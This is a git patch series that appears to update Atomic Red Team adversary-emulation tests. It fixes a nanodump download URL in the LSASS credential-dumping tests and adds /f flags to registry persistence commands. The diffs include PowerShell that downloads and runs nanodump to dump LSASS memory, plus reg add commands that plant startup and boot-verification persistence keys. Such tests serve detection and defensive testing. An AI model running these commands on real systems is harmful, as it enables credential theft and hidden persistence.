From 7da5d0d1970d6944a285dd3239db242732aed478 Mon Sep 17 00:00:00 2001 From: Retrospected Date: Mon, 21 Oct 2024 23:30:01 +0200 Subject: [PATCH 1/4] Fix nanodump download url --- atomics/T1003.001/T1003.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 5b92a022cd..5044450b3d 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -109,7 +109,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" + Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" executor: command: | PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp" From 760f2082b3f9485315af8d7ba6cce87b0dc9abac Mon Sep 17 00:00:00 2001 From: Retrospected Date: Mon, 21 Oct 2024 23:34:22 +0200 Subject: [PATCH 2/4] Fix nanodump download url --- atomics/T1003.001/T1003.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 5044450b3d..9a6123c9ec 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -422,7 +422,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" + Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" executor: command: | PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}" From 739b1111d9a4e83c35cafec75e824118ff9de8df Mon Sep 17 00:00:00 2001 From: Retrospected Date: Sun, 15 Dec 2024 14:43:27 +0100 Subject: [PATCH 3/4] Update T1547.001.yaml add /f argument to force changing the registry key since it already exists. without /f it will prompt to overwrite --- atomics/T1547.001/T1547.001.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index bb0b61f348..4926120531 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -392,8 +392,8 @@ atomic_tests: default: calc executor: command: | - reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /v StartupPrograms /t REG_SZ /d "#{malicious_app}" - cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /v StartupPrograms /t REG_SZ /d "rdpclip" + reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}" + cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /f /v StartupPrograms /t REG_SZ /d "rdpclip" name: command_prompt elevation_required: true From 9978a2cad214e71d17236b5f808e64b29e83fa4b Mon Sep 17 00:00:00 2001 From: Retrospected Date: Sun, 15 Dec 2024 15:12:26 +0100 Subject: [PATCH 4/4] Update T1547.001.yaml --- atomics/T1547.001/T1547.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 4926120531..c8de9aa211 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -412,6 +412,6 @@ atomic_tests: executor: command: | reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /v ImagePath /t REG_SZ /d "#{malicious_file}" - cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram + cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram /f name: command_prompt elevation_required: true